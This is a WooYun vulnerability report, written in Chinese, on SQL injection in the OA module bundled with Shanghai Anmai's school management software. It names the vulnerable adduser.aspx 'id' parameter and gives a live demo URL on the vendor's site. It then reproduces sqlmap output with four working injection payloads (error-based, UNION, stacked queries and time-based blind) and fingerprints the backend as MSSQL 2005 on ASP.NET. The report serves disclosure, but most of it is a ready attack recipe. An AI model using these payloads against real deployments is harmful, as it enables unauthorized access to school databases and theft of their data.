WooYun.org

问题厂商：上海安脉计算机科技有限公司
谷歌百度：版权所有：上海安脉计算机科技有限公司
大量学校使用该系统 管理平台没发现漏洞，但是这套系统附带一套oa系统
/anmai/oa/adduser.aspx
在密码出现sql注入 只能手工不好利用

但是 这有个用户修改 只需添加参数id /anmai/oa/adduser.aspx?id=1 （id存在注入）
以该公司demo为例
http://www.anmai.net/anmai/oa/adduser.aspx?id=1
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1' AND 9850=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (9850=9850) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113))) AND 'HCnH'='HCnH
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=1' UNION ALL SELECT 67,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(76)+CHAR(90)+CHAR(67)+CHAR(75)+CHAR(67)+CHAR(72)+CHAR(80)+CHAR(66)+CHAR(86)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113),67,67,67,67,67,67--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1' WAITFOR DELAY '0:0:5'--
---
[11:10:22] [INFO] testing Microsoft SQL Server
[11:10:22] [INFO] confirming Microsoft SQL Server
[11:10:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[11:10:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[11:10:26] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.anmai.net'